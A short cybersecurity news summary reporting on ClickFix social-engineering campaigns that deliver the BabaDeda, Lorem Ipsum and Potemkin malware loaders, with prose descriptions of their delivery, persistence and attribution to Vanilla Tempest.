ClickFix Campaigns Deploy Three New Loader Families
Cybersecurity researchers have identified multiple active ClickFix campaigns distributing three distinct malware loaders: BabaDeda Loader, Lorem Ipsum Loader, and Potemkin. These campaigns were reported independently by Morphisec, BlueVoyant, and Huntress. The BabaDeda Loader, first observed in April 2026, targets education and financial organizations. It uses ClickFix social engineering lures to trick users into running PowerShell commands that deliver the loader. This loader then drops information stealers and remote access trojans by combining techniques like hidden PowerShell, in-memory shellcode, DLL side-loading, and external payload storage. The loader profiles the host, avoids Russian and Belarusian systems, and performs security product checks before injecting the main payload into a trusted Windows process such as svchost.exe.
How the Lorem Ipsum and Potemkin Loaders Operate
The Lorem Ipsum Loader campaign uses at least five compromised WordPress sites as starting points. These sites span architecture, legal services, and construction technology. Attackers present fake Edge browser security update lures to run commands that download a ZIP file and an outdated Node.js version to execute JavaScript payloads. The JavaScript drops a batch script that sets up DLL side-loading persistence to decode the loader. The loader then retrieves a backdoor from attacker controlled profiles on social networking platforms. Separately, the Potemkin campaign installs an MSI package that drops the loader via an HTML Application payload. Potemkin uses a domain generation algorithm to find its command and control server and reflectively loads modules in memory. It supports components for lifecycle management, victim identification, and task polling, and uses a custom byte cipher to protect communications.
Impact and Scope
These ClickFix campaigns demonstrate an evolution in loader frameworks, becoming increasingly modular by separating delivery, storage, execution, and payload deployment into distinct components. The Lorem Ipsum ecosystem is attributed with high confidence to the financially motivated threat actor Vanilla Tempest, known for deploying ransomware families like Rhysida and BlackCat. In the Potemkin campaign, attackers have been observed engaging in hands on keyboard activity to configure Microsoft Defender exclusions, deploy reverse SOCKS tunnels, and spread laterally to domain controllers. ClickFix remains an effective technique across Windows and macOS, exploiting human tendency to follow authoritative instructions. Researchers note these attacks represent how adversaries rapidly adapt to alternative delivery models despite law enforcement disruptions.
Source: The Hacker News
